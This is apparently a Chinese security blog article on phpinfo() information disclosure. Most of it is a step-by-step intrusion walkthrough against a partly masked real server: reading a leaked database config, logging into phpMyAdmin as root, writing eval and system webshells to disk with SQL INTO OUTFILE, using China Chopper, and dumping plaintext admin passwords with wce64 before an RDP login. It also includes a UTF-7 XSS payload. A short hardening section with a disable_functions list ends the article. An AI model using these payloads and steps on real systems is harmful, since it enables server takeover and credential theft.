PHPInfo()信息泄漏漏洞利用提權(quán)及防范
原創(chuàng)PHPInfo函數(shù)信息泄露漏洞常發(fā)生一些默認的安裝包,比如phpstudy等,默認安裝完成后,沒有及時刪除這些提供環(huán)境測試的文件,比較常見的為phpinfo.php、1.php和test.php,雖然通過phpinfo獲取的php環(huán)境以及變量等信息,但這些信息的泄露配合一些其它漏洞將有可能導(dǎo)致系統(tǒng)被滲透和提權(quán)。
1.1phpinfo函數(shù)
PHP中提供了PHPInfo()函數(shù),該函數(shù)返回 PHP 的所有信息,包括了 PHP 的編譯選項及擴充配置、PHP 版本、服務(wù)器信息及環(huán)境變量、PHP 環(huán)境變量、操作系統(tǒng)版本信息、路徑及環(huán)境變量配置、HTTP 標頭、及版權(quán)宣告等信息。其函數(shù)定義如下:
語法: int phpinfo(void);
返回值: 整數(shù)
函數(shù)種類: PHP 系統(tǒng)功能
例如新建一個php文件,在其中輸入以下內(nèi)容:
- <?php phpinfo(); ?>
1.2phpinfo信息泄露
該函數(shù)主要用于網(wǎng)站建設(shè)過程中測試搭建的PHP環(huán)境是否正確,很多網(wǎng)站在測試完畢后并沒有及時刪除,因此當訪問這些測試頁面時,會輸出服務(wù)器的關(guān)鍵信息,這些信息的泄露將導(dǎo)致服務(wù)器被滲透的風(fēng)險。
- <html>
- <head>
- <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
- </head>
- <body>
- <iframe src="http://域名/phpinfo.php? ADw-SCRIPT AD4-alert(document.domain); ADw-/SCRIPT AD4-=1">
1.3一個有phpinfo泄露滲透的實例
1.分析phpinfo函數(shù)暴露出來的有用信息
從網(wǎng)站phpInfo.php程序運行的結(jié)果中我們可以獲取以下有用的信息:
(1)操作系統(tǒng)為Windows2008 Server或者Windows7: Windows NT BNKUMDFI 6.1 build 7601
(2)服務(wù)器使用了Apache 2.4,這意味著如果拿到Webshell后99%可以提權(quán)成功,Apache在Windows環(huán)境下權(quán)限極高,默認為System權(quán)限。
(3)網(wǎng)站默認路徑:D:/WWW 通過mssql或者mysql直接導(dǎo)入一句話需要知道網(wǎng)站真實路徑,這個出來就很好辦了。
圖1獲取有用信息
2.查看泄露文件
對根目錄進行訪問,如圖2所示,發(fā)現(xiàn)有mail.rar以及三個文件目錄,其中有一個phpMyAdmin,這個是mysql的php管理,有這個只要獲取數(shù)據(jù)庫密碼即可導(dǎo)入導(dǎo)出數(shù)據(jù),包括導(dǎo)出一句話后門。對其中的壓縮文件進行下載,并查看其中的數(shù)據(jù)庫配置文件。
圖2查看泄露的其它文件
3.獲取數(shù)據(jù)庫口令
在mail文件夾下,發(fā)現(xiàn)數(shù)據(jù)庫連接文件為connect.php文件,打開后獲取數(shù)據(jù)庫的用戶和密碼,數(shù)據(jù)庫用戶為root,密碼為空。
圖3獲取數(shù)據(jù)庫用戶帳號和密碼
4.連接并查看數(shù)據(jù)庫
如圖4所示,在瀏覽器中打開http://183.***.160.***:5555/phpMyAdmin/,輸入剛才獲取的帳號,直接登錄,登錄后可以查看其所有數(shù)據(jù)庫。
圖4登錄并查看數(shù)據(jù)庫
5.導(dǎo)出一句話后門到服務(wù)器
目前導(dǎo)出一句話后門的方法有以下幾種:
(1)創(chuàng)建表方式
- CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
- INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
- SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/www/exehack.php';
- DROP TABLE IF EXISTS `darkmoon`;
上面代碼是在mysql數(shù)據(jù)庫中創(chuàng)建darkmoon表,然后加入一個名字為darkmoon1的字段,并在darkmoon1的字段中插入一句話代碼,然后從darkmoon1字段里面導(dǎo)出一句話到網(wǎng)站的真實路徑“d:/www/exehack.php”,最后就是刪除darkmoon這個表,執(zhí)行效果如圖5所示。
圖5執(zhí)行導(dǎo)出一句話sql腳本程序
注意:在使用以上代碼時必須選擇mysql數(shù)據(jù)庫,并在phpMyAdmin中選擇SQL,然后執(zhí)行以上代碼即可。需要修改的地方是網(wǎng)站的真實路徑和文件名稱“d:/www/exehack.php”
(2)直接導(dǎo)出一句話后門文件
- select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php'
如果顯示結(jié)果類似“您的 SQL 語句已成功運行 ( 查詢花費 0.0006 秒 )”表明后門文件生成成功。
(3)直接執(zhí)行命令權(quán)限的shell
- select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/cmd.php'
該方法導(dǎo)出成功后可以直接執(zhí)行DOS命令,使用方法:www.xxx.com/cmd.php?cmd=(cmd=后面直接執(zhí)行dos命令),如圖6所示。
圖6導(dǎo)入可以執(zhí)行命令的webshell
6.獲取webshell
對導(dǎo)出的webshell在網(wǎng)站進行訪問測試,如圖7所示,如果沒有顯示錯誤,則表示可以運行,在中國菜刀一句話后門管理中添加該地址直接獲取webshell,如圖8所示。
圖7測試導(dǎo)出的webshell
圖8獲取webshell
7.服務(wù)器提權(quán)
通過中國菜刀隊遠程終端命令,直接在其中執(zhí)行命令,如圖9所示,可以查看是否開啟3389端口,系統(tǒng)當前用戶的權(quán)限是系統(tǒng)權(quán)限,查看當前都有什么用戶。上傳wce64.exe并執(zhí)行“wce64 -w”獲取當前登錄明文密碼。
圖9執(zhí)行命令
圖10獲取系統(tǒng)管理員密碼
8.登錄3389
在本地打開mstsc.exe直接輸入用戶名和密碼進行登錄,如圖11所示成功登錄該服務(wù)器。
圖10成功登錄該服務(wù)器
9.總結(jié)
系統(tǒng)一個小小的失誤,再加上一些偶然的因素,就導(dǎo)致一個系統(tǒng)被滲透,并獲取了服務(wù)器權(quán)限,因此phpinfo.php信息泄露不可忽略。phpinfo信息泄露還可以進行跨站攻擊,將以下代碼保存為1.html.
10.防范方法
(1)通過修改服務(wù)器環(huán)境內(nèi)php.ini文件,將“expose_php = On”修改成“expose_php = Off”然后重啟php即可。
(2)如果確實需要該測試信息,在測試時使用,測試完畢后將該文件刪除掉。
(3)若無需要可以將一些php的危險函數(shù)禁用,打開/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函數(shù)名:
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,
proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,
symlink,popepassthru,stream_socket_server,fsocket,fsockopen